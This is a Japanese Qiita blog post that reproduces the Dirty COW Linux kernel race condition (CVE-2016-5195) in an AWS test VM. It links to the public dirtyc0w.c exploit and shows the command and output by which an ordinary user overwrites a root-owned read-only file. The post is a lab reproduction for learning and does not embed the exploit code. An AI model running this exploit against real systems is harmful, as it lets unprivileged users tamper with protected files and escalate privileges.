Help us understand the problem. What is going on with this article?

Linux 脆弱性の検証 Dirty COW (CVE-2016-5195)

More than 3 years have passed since last update.

Linuxの勉強中にCOWを調べていたら、こんな脆弱性の情報を見つけたので、AWSのゲストOSで試してみました。

結論から言うと、脆弱性が再現されました。(一般ユーザーがrootユーザーのファイルを書き換えてしまうことを確認)

【情報元】
①脆弱性の内容
https://dirtycow.ninja/
"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system." (RH)

②実験用のソースコード    
https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c
③参考にしたサイト
https://www.agilegroup.co.jp/technote/dirty-cow.html
④Race Conditionとは
https://ja.wikipedia.org/wiki/%E7%AB%B6%E5%90%88%E7%8A%B6%E6%85%8B

1. rootユーザーで一般ユーザーはRead Onlyのファイルを作成。

$ sudo -s
# more confidencial.txt 
This is important file
# chmod 0404 confidencial.txt 
# exit

2. 実験用の実行ファイルを実行。

$ more confidencial.txt 
This is important file
$ ./dirtyc0w confidencial.txt m00000000000000000
mmap 7f4f3e8e7000

madvise 0

procselfmem 1800000000

$ 

3.以下のように、一般ユーザーにファイル内容を書き換えられてしまっている。

$ more confidencial.txt 
m00000000000000000file
$ 

以上です。
やはりセキュリティ強化のためのメンテナンスは大切ですね。

Thank you! :grin:

takeshim
Data Analysis | Machine Learning | Systems Engineer
https://github.com/tkshim
Why not register and get more from Qiita?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
Comments
No comments
Sign up for free and join this conversation.
If you already have a Qiita account
Why do not you register as a user and use Qiita more conveniently?
You need to log in to use this function. Qiita can be used more conveniently after logging in.
You seem to be reading articles frequently this month. Qiita can be used more conveniently after logging in.
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
ユーザーは見つかりませんでした